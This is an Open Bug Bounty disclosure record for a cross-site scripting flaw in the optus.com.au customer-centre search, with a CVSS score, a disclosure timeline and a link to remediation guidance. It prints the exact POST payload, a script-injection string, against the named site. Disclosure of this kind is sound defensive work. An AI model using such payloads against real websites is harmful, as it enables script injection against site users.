Following the coordinated and responsible vulnerability disclosure guidelines of the **[ISO 29147](<https://www.iso.org/standard/45170.html>)** standard, Open Bug Bounty has:
a. verified the vulnerability and confirmed its existence;
b. notified the website operator about its existence.
Affected Website:| **[optus.com.au](<https://www.optus.com.au>)**
---|---
Vulnerable Application:| Custom Code
Vulnerability Type:| **[XSS (Cross Site Scripting)](<https://owasp.org/www-community/attacks/xss/>)** / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Discovered and Reported by:| **tbm**
Remediation Guide:| **[OWASP XSS Prevention Cheat Sheet](<https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html>)**

Vulnerable URL: `https://www.optus.com.au/customercentre/search`

HTTP POST data: `query=</script><script>alert ( 'XSSPOSED')</script>&question=`

**Mirror:** [Click here to view the mirror](<http://120110.openbounty.org/mirror/>)
### Coordinated Disclosure Timeline
Vulnerability Reported:| 25 December, 2015 08:55 GMT
---|---
Vulnerability Verified:| 25 December, 2015 08:57 GMT
Website Operator Notified:| 25 December, 2015 08:57 GMT
a. Using publicly available security contacts| 
b. Using Open Bug Bounty notification framework| 
c. Using security contacts provided by the researcher| 
Public Report Published [without technical details]:| 25 December, 2015 08:57 GMT
Vulnerability Fixed:| 17 November, 2021 00:52 GMT